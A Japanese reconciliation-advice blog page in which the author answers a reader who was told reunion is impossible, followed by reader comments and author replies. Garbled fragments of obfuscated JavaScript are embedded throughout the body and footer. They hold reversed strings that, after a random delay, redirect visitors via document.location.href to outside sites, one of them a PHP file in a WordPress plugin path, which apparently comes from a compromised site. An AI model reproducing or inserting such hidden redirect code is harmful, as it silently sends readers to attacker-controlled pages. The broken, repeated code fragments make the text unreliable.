「気になる人ができた」「復縁はない」と言われても復縁できるのか?

この記事は4分で読めます

こんにちは、復縁ドッグです。

コンニチハ!!(゜Д゜*)

私は、1年2ヶ月の歳月を経て、復縁に成功し、

今では、その彼女と結婚しています。

諦めなくてよかった!復縁までの成功体験談

 

このページでは、復縁ドッグがサポートしている

復縁活動中の方から、送られてきた相談メールを見ながら、

その悩みの、解決法を掲載しています。

 

復縁活動中の方の悩みは、みな似ていますので、

参考になると思いますよ。

 

では、はじめていきましょう。

☆ミ(o*・ω・)ノイッテキマ-ス!!

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 1px solid #460e44; background-color: #e7e7eb;”>

今回は、復縁相手に「この先、復縁は考えられない」

と言われてしまって、復縁できるかどうか、

心配になってしまった方からの、相談メールです。

。・゚゚・(>д<;)・゚゚・。 ヒィッ

 

こんなこと言われたら、

・本当に復縁できるのか?・諦めるべきなのか?

そう思ってしまうのも当然ですよね。

 

では、この場合、どのように考えていったらいいのでしょうか?

実際の相談メールと、復縁ドッグの、回答を見ていきましょう。

※個人が特定される部分はカットさせていただいております。

 

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 3px solid #38b48b;”>

【質問】

まだ7ステップの届いてないんですけど、すごく相談したいことがあります。

 

復縁したい元カノの話なんですが、昨日共通の女友達とご飯に言ったそうで、そこでいろいろ話したみたいです。

 

そこでは、復縁はあり得ないだとか今良い感じの人がいて告白すれば付き合えそうだとかっていう話までしていたそうです。

 

自分とは友達としてなら付き合うのはありだが、復縁は本当にこの先も考えられないと断言していたそうです。

 

こんな状況でも復縁できますでしょうか??

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 3px solid #e9546b;”>

【回答】

こんばんは、復縁ドッグです。

 

メールありがとうございます。

「復縁はありえない」

なるほど、そうですか・・・。

 

でも、私の場合もそうでしたが、普通の別れを迎えた場合

ですと、復縁するかもしれないと思って、

別れる人の方が、稀だと思いますよ。

 

つまり、普通は、「この先、復縁はありえない。」

そう思って別れるんです。

 

でなければ、そもそも、別れていませんよ^^

 

元カノさんも、普通の別れ方をしたわけですので、

復縁しないと言っていることは、自然だと思います。

特に、珍しいことではありませんので、

動揺してはいけませんよ。

 

まずは、7stepを使って2人の関係を見つめ直していきましょう。

 

焦って、変にアプローチをすることが

一番、復縁を遠ざけてしまいますので、

今は、動いてはいけませんよ。

 

辛いと思いますが、自分の為だと思って、

耐えていきましょう。

 

辛かったら、いつでもメールくださいね^^

溜め込むと、余計なことばかり考えてしまって、

良い方向には、進みませんからね。

 

頑張っていきましょう。

 

復縁ドッグ

 

 

復縁とは、相手の感情を変える行為です。

 

回答にも書きましたが、別れを切り出した段階で、

復縁相手は、自分との復縁は、考えていません。

(;´Д`) うぅっ。。

 

ですから、その“復縁なんてありえない”といった感情から、

“復縁してもいいかも”そして、“もう一度、付き合いたい”へと、

相手の感情を、変えていく行為が、復縁活動なのです。

 

別れたばかりの時に、

「もうやり直すことはできない・・・。」

「この先、復縁はないよ・・・。」

 

なんて、断言されても気にすることはありません。

w(゜o゜*)wマジ!?

 

 

 

だって、それ、当たり前のことなんですもの。

(; ̄Д ̄)なんじゃと?

 

 

 

復縁することを前提に、別れる人はいません。

 

 

 

現に、復縁ドッグの場合でも、元カノである愛に、

「復縁できないよ・・・。」なんて、普通に言われていました。

 

最近、当時のことを、愛に聞いてみても、

「復縁するなんて、考えられなかった。」

と、言っているくらいです。

Σ( ̄□ ̄;)//ェッッ!!?

 

そんなこと言われていた、復縁ドッグでも、復縁できましたし、

復縁できないと言っているのは、今の感情で言っていることです。

 

感情が変われば、発言も変わってきます。

 

 

 

ですから、復縁相手が何を言っていようと、

「その気持ちを、変えてやる!」くらいに思っていれば

いいだけなんです。

(・□・)ノ<ハィ!!先生!!

(≧▽≦)ゝ了解シマシタ!!

 

 

 

いいですか、あなたは復縁を、諦める必要もないですし、

凹む必要なんて、一切ありません。

 

相手が嫌がる行為は、やってはいけませんが、

それ以外のことは、すべて、やるんです。

 

そして、ここで大事な事は相手をコントロールして変えるのではなく、自分が変わって、その変わった自分を見て、はじめて相手の気持ちが変わるんです。その努力が、相手の心を動かし復縁につながるのです。

 

ここが大事なとこ。

自分が変わって、その後、相手。

この順番を逆にしてはいけませので、ここだけ注意しておいて下さいね。

 

これを読んでいただいている方、

凹む気持ちも分かりますが、諦めずに頑張っていきましょうね。

この他、復縁に関する正しい知識は、

別ページでも載せていますので、しっかり読み込んで、

あなたの恋愛レベルを上げていきましょう。

フレー※\(* ̄▽ ̄*)/※フレー

 

復縁は、その先にまっているのですからね。

では、また別ページでお会いしましょう。

 

復縁ドッグ

 

この記事を読んでいる人は以下のカテゴリー記事も読んでいます。

1年2カ月復縁ドッグ復縁体験談
復縁失敗体験から学ぶ復縁講座
復縁ドッグによる復縁基礎講座
復縁活動中の方からの疑問を解決
復縁マニュアルレビュー

  • このエントリーをはてなブックマークに追加

関連記事

コメント

    • はる

    はじめまして
    はると言います
    高校生です
    記事よませていただきました

    復縁ドックさんに相談したいことがあるのですがよろしいですか?

      • 復縁ドッグ

      こんばんは、はるさん
      復縁ドッグです。

      高校生ですか!
      でも、復縁の悩みは年齢じゃないですからね…。

      高校時代は、中学校の元カノとのことで自分を見失っていましたよ。
      個別のご相談は、こちらからでは難しいですが、今動画を撮ったり
      していますので、より分かり易く復縁の知識が付くと思います。

      でも、こうして高校生で真剣に復縁を考えているところを見ると、
      1つ1つの恋愛できちんと、学ばれているんですね。
      是非、その姿勢を貫いて欲しいと思います。

        • つよし

        こんにちは高校二年の17です。付き合い期間が4ヶ月と20日くらいと短くまだ未熟でこれから先いろんな出会いがありますがやはり彼女がいいと思ってます。復縁ドッグさんの記事を読んでノートに自分なりにまとめ反省点を見つけたりと勉強しています。質問なのですが7stepは成人じゃないと意味がないし購入しないでくださいと書いてあります…復縁にも恋愛にも年は関係ないと思うしこういった場合どーすればいいのでしょうか。正直先が見えなくなってしまいそうです。

          • 復縁ドッグ

          こんにちは、つよしさん
          高校生ですか!私は1つの恋愛に打ち込めていなかった時期ですね…。
          ノートにまでまとめて勉強されているその姿勢、素晴らしいと思います。
          確実に、恋愛レベル上がっていますよ(^^♪

          7stepは保護者の同意がない限り、未成年は買えないみたいですね。
          恋愛には年齢は関係ないという意見は、私も同感です。
          ただ、恐らくですが、法律上の問題だと思いますので、
          サイトや動画でも色々話していくつもりですので、恋愛レベルあげられると思いますよ。

          先が見えないのではなく、見ようとしていないだけです。
          小さな光でも、見つければ進んでいけると思います。
          解釈を変えるだけでも、小さな光は見つかるものです。

          感情コントロールからスタートしていくのがいいと思いますよ。
          がんばれーー!

    • K君

    初めまして。
    復縁ドックさんの記事よく読んでます。
    彼女に好きな人ができたと振られてから3週間が立ちます。
    振られてからはたまに連絡をとり友達のような関係でしたが今は全く連絡が帰ってきません
    自分は嫌われてしまったのでしょうか
    辛くてどうしたらいいのかわかりません

      • 復縁ドッグ

      こんにちな、K君さん
      個別の相談は、当サイト経由で7step参加者さんだけに行っていますので、
      何ともお応えできないのですが、現在、必要なことはサイト記事にも
      書いていくつもりですので、要望がありましたら、ご連絡いただければと思います(゚Д゚)ノ
      ただ、辛いからこそ頑張れると私は思っていますし、実際、私はそうでしたからね。
      辛いから、変われるのだと思います。

    • あかり

    初めまして。
    もうすぐ大学生になる18歳です。1ヶ月以上前に遠距離で付き合っていた彼と別れたのですが・・・・理由は彼に好きな人ができたからです。もう二度と連絡しない!って言ってしまい、別れてから連絡してないのですが・・・私なりに彼と付き合っていたこと、復縁することについてたくさん考えて、やはり彼が好きだと思い、少しずつ彼にラインしようと思います。ですが・・・どういう風に話しかけていいかわからないのです。復縁ドッグさんの動画などいつも拝見させていただいております!とても勉強になっています。小さいノートにポイントとかを自分で考えてメモってます!(笑)ただ、私は二度と連絡しないと言ってしまっていますから、話しかけづらくて・・・・。もうすぐ彼の誕生日なので、その時に・・・と思ったのですが、誕生日にラインを送るなんて、未練があるとばればれだし、文末に「返事はいりません」と入れようと思ったもののやはり誕生日にラインはどうなのかな・・・・・と思って悩んでいます。復縁ドッグさん的にはどう思いますか?

      • 復縁ドッグ

      そうですね、、、。
      個別のご相談はコメントではできないので、
      何とも言えませんが、問題はあかりさんがどう変わっているかだと思いますよ。
      そういった部分は彼は敏感に感じ取っていますからね。
      別れ際に言った言葉は、売り言葉に買い言葉状態なこともありますので、
      気にしないでいいんですよ。

      こちらが思っているほど、そんなに執念深く覚えていない場合もありますからね。
      その時は、お互い様だったと思っている場合も多いですよ。
      こちらが変わるから相手も変わる。
      こちらが変わらなければ、相手も変わらないんですよ。
      自分の変化にフォーカスしていきましょうね。

    • エリンギ

    初めまして。
    1年半付き合ってた彼女に大学受験を機に別れを告げられ、1週間が経ちました。
    僕は復縁をしたいがために別れるときに、「もう一度俺のこと好きにさせて見せる」と言ってしまいました。
    向こうはまだ僕のことを好きではいるがすぐに復縁は無理だと言われました。
    これって遠回しに諦めろと言われてるんですかね?
    毎日胸が痛くて苦しいです。

      • 復縁ドッグ

      別れを切り出した時点で、相手は復縁は考えていませんからね。
      そう言われてしまうのも、無理はないと思います。
      だからといって、その気持ちが一生続くとも限りませんし、
      エリンギさんを見て、気持ちも変わるんですよね。

      苦しいのは皆同じです。
      その苦しさを成長のエネルギーに変えられるかどうかで、
      パワーの使い道が変わってきます。後悔の気持ちに使っていくのか、
      成長に使えていくのか?それによっても成長スピードは全然変わってくるでしょう。
      前に進むしかないと思いますよ。
      自分の得たい人生は自分で切り開くものです。
      その為に、自分を成長させていくこと。
      これは必須事項だと思います。

    • フィンデンドロン

    初めまして。こんにちは。
    僕は、今年高校一年生になったものです。
    僕には、一年弱付き合っている彼女がいます。その彼女とは高校が違い、離れてしまいました。ですが、家は近いです。
    その彼女は、すごい僕にやきもちを妬いたり、束縛もしてくれていて、「僕のことをこんなにも思ってくれているんだな。」と思っていました。「将来一緒に暮らそう。絶対裏切らない。ほかの人にも惚れない。○○のこと、本当に大好きだから。離したら許さないから。」とも言ってくれていました。
    ですが、高校が始まってすぐに。「ほかに好きな人ができて、もう付き合えない。」「束縛されるのに疲れた。」と言われました。確かに束縛はしていたところがないとは言えません。ですが、以前、この「束縛」ということでもめたことがあり、それ以来からは割と縛らなかったです。縛ってたといえば、「他の異性との連絡先を交換したりするときに一声かけて」、などでした。ですが、「彼女にとっては大きな負担になっていたのかもしれないな…」と、本当に反省しています。
    彼女が好きになったという人は、彼女と同じ高校で、同じクラスになった人でした。
    今現在、僕はすごく、なんといえばいいのでしょう。信じていたのに…という気持ちでいっぱいです。
    時間がかかってもいいので、もういちど。もういちど楽しかったあのころに。一緒に笑って、一緒に泣いて。時には喧嘩もして。そしてまた仲直りして、お互いを理解しあっていく。当たり前の存在ほど、離れてみると、その存在の大きさが改めてわかります。時間をかけてでも。やり直したいんです。
    なので、どうすればもとにもどれるか。時間をかけてでも元に戻りたいです。お願いします。

    • けん

    初めまして、先日別れた男です。

    原因は彼女が俺を好きな気持ちがわからない、俺の言うことが全て疑って聞こえてしまう。
    俺が悪いんじゃない、私の勝手なの。
    で、のちにお互い周りの友達も巻き込んだドロドロのケンカをしてボロボロの別れでした。

    もう好きな気持ちはない
    戻ることも2度とない
    信用できない
    私は今、日々頑張って前に進んでいます
    さよなら

    と言われて終わりました
    どうすればいいですか?

    • まさ

    初めまして就活生です。
    こんにちは!
    たくさんの記事を読ませて貰いました!

    私は最近3年間付き合っていた彼女と別れました…
    別れ方は直接会って彼女が彼氏の存在意義がよくわからないと言われてしまい、それにわがままな自分を直すためにもあなたと別れたいと言われて僕は彼女の為にもこの言葉を受け入れました…浮気をしてい事を知るまでは…

    その時振られた後に言われた言葉が「1.2ヶ月経てばまた好きになるかもしれない」と言われました。
    私としてはこの言葉を励みに復縁を成功させたいと思っていますが、別れ話をした日の1週間ほど前に彼女はバイト先の男性と浮気をしていたんですね…
    それを知った時あの言葉はただの優しさで、いつかはその浮気をした男性と付き合うのだろう思いました
    彼女の性格上確実に付き合います。

    この場合私が取る行動はどんな事ですか?

    • まさき

    復縁ドッグ様

    サイト、拝見する度に目から鱗が落ちました。
    わかっていたつもりのことも、
    気がつけていなかったこともたくさんあったのだと
    大変勉強させていただいております。
    相談させていただきたかったのですが、
    ここでして良いのでしょうか?

    復縁ドッグ様の体験談を見る度、共通点が多くまるで自分の経験を見ているようでした。

    私は現在28歳で、21歳の彼女と3年の遠距離恋愛の末、
    彼女も実家を離れ、仕事を辞めてまで
    今年の4月から同棲に至ったのですが、1ヶ月も経たない時に
    私の悪癖であった携帯を覗くことをしてしまい、怪しい男性からのメールを見つけてしまい
    それで感情的になって問い詰めて
    その後
    彼女に、「束縛が嫌だった」と先月別れを告げられました。

    私は夢であった公務員を目指して、
    バイト同然の仕事を二人の生活のために頑張りながら
    一次試験を通過したところで、
    面接試験を控えていたところだったので
    とてもつらかったです。

    つらい時期も、感情的にすがる時期もありましたが
    復縁を勧めるサイトで高いメール相談をしたりしながら、復縁活動をしていました。
    なるべく未練を払拭するようなメールを心がけ、
    アドバイス通りLINEのタイムラインで
    元気な様子を投稿したり、ジムに行き始めたことを投稿したりアピールをしていました。

    自分自身、自信がなかったから束縛していたのだと、それで彼女が傷ついて
    ストレスから逃げようと、他の男性に心を開いたのだと思い、
    人に話を聞いてもらったり、身体を鍛えたり
    面接試験にも前向きに準備をして
    自分を成長させようとしました。

    すべて戦略的に、と行動していました。
    しかし、それをダメにしてしまいました。

    その怪しかった彼の本名を知っていたので
    その彼のTwitterやインスタグラムを監視していたのですが、
    別れた後、やっぱり彼女と何度かデートをしている投稿を見てしまい
    酒を飲んでいたこともあって
    感情的に彼女に復縁したい旨のラインをしてしまったのです。
    それが1週間前のことですね。

    それについては夜中であったのに
    すぐに既読がついたのですが、
    今だ返信はありません。

    また、その次の日、ありがたいことに公務員の試験に合格し、
    そのことも彼女と、応援してくれていた
    彼女のお母さんにメールしました。
    2人のおかげだ、ありがとうと送ったのですが
    それに対しても返信はありません

    その間にも彼のSNSを見る感じだと、どこかにデートに行っていたみたいです。

    そして、彼と何か楽しいことがあったり
    気を引くように落ち込んだ顔文字をしていた彼女のLINEの一言が
    そのデートの日から空欄になっています。
    その日から今日で3日目になります。

    私と喧嘩して彼女が実家に帰って、次の日には彼と何処かにご飯を食べに行っていました。
    ちょうどその一ヶ月後がさっき言ったデートの日でした。
    彼女の一言が、楽しいデートの後なのに空欄なのは
    私の復縁を断るつもりの表れなのだと思います。

    私との関係を切ってからまる一ヶ月、
    彼女は彼との付き合いに応じるのを待っているんだと思います。
    そのくらい誠実な子なんです。
    そのくらい誠実に付き合おうとしているのも、私にとってはつらいです。

    そんな時に、私を可愛がってくれていた
    祖父が危篤状態にあり、
    それなのに私は彼女のことばかり考えていて、申し訳なく思います。

    ですが、復縁を諦めるつもりはありません。
    復縁を断られたら、きっと感情的になってしまうからと
    彼女の悩んで答えを出してくれた気持ちを大事にしたい、
    ふたりを祝福してる、
    私が思う彼女へのアドバイス、
    困ったことがあったら話を聞くし
    私も何かあったら頼らせて欲しい、
    そういうことを紙に書き出し、携帯のケースの裏に仕込んであります。

    そうやって、次に繋げられる振られ方をしようと思っています。

    長々と申し訳ありません。
    本当に頼りになると思える人に聞いてもらいたくて。

    思えば、その彼は20歳らしいのですが
    見た目は私に似ているのです。
    ですが性格は、なんというか下品で
    彼女を任せる、なんてとても思えない相手なのです。
    そんな相手を選ばせるほど彼女を傷つけてしまったのだと
    私の責任を感じます。

    サイト、何度も記事を読ませていただいて
    もっと心を強く持とうと思います。
    話を、一方的でしたが聞いていただけるような気がして
    少し楽になりました。
    本当にありがとうございます。

    • ポチョムキン

    復縁ドッグさん、こんにちは!
    何度もサイト拝見させて頂いてます!
    現在、復縁に向けこのサイトを参考に
    しながらも、自分なりの模索しながら
    前向きに考えてる者です。
    何より、独り善がりだった想いを、
    今は、自分自身落ち着いて見れる様に
    なりました。
    元カノの何が別れを決意させたのか、
    今はじっくり考え、自分なりに原因を
    見つけそこを克服している最中です。
    何とか、元カノと友達(同級生)状態
    には戻れました。
    お互いバツイチ(元カノは2人の子持ち)
    で40半ば、なかなか難しいとは思いますが
    諦めないで《この人しかいないっ!》を
    糧に頑張ります★

    で、皆さんのコメント読んでて、思ったん
    ですが

    『個人相談はここでは受け付けない』

    っての読んで無いんですかね?
    私からしたら、そう言う所が相手の気持ちに
    なれて無いのかなと思います。
    女性心理で言う『解ってないな・・・』
    ですかね?

    書き込む皆さん、チョット冷静になりませんか?!

    • nakamaru

    相談したい事があります。
    話を聞いてもらう事はできますでしょうか??

    • たく

    第三者が僕の復縁の邪魔をしてきます。
    どうすればいいですか?

  1. メールの相談の仕方がわからなかったので
    ここに書かせていただきます。

    高校生です
    私は3年付き合った彼氏に
    振られました。私のわがままで冷めたみたいです。
    でも私が2週間自分なりに作戦を立て、一度復縁できました。
    しかし1週間で振られました。
    好きな人ができたということと、私のことを好きになれないということ、
    あと、別れたくないと言ったら、そゆ重いのも無理と言われてしまいました。
    振られる前日の夜はいい感じのトークをしてて
    戻ってきたかなとワクワクしていたのに、
    次の日いきなり機嫌が悪くなり、振られました。
    ラインも電話もすんなと言われました。
    好きな人がいつからいたのか謎だし、
    私には好きな人がいるというふうには見えないぐらい
    ラインの相手の態度が前に戻ったようでした。

    彼の友達の話だと、
    前に進むしかない!や
    今わ好きな人のことが大好きみたいだから
    どーしようもないわ
    と言われました。

    けど私は、どうしても諦めたくないです。
    こんなので簡単に嫌いになれるほど3年間軽く付き合ってきてません。
    本当に大好きなんです。
    もし次の人で彼のことを忘れれるとしても
    次の人は私にいらないです。
    新しい人なんかいらないんです。

    でもどうしたら復縁に近づけるかわからず
    毎日悩んでいます。
    ちなみに2回目に別れてから1週間ちょっと経ったところです。

    復縁ドックさん、どうか教えてください。。

  1. この記事へのトラックバックはありません。

管理人:復縁ドッグ


恋愛レベルの向上なしに復縁はできない!

恋愛レベルの向上なしに夫婦の絆は作れない!

をモットーに、当サイトは運営されています。


1年2ヵ月の歳月を費やし、

自力で復縁に成功した復縁ドッグは

現在、復縁した彼女と結婚し

幸せな家庭を築いています。



→復縁ドッグによる前10回復縁メール講座



→復縁ドッグの10年以上に渡る復縁日記



→復縁に欠かせない基礎知識


youtube動画一覧

復縁オンライン講座




【7step】メールサポート第2弾!第三者=協力者の助けは必要?
【元カノにインタビュー】復縁できる別れ方と新しい恋人の存在
復縁冷却期間を大攻略!基礎から応用まで全部教えます
$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topで【小澤7step】復縁マニュアルを実際に購入してみた" class="title">info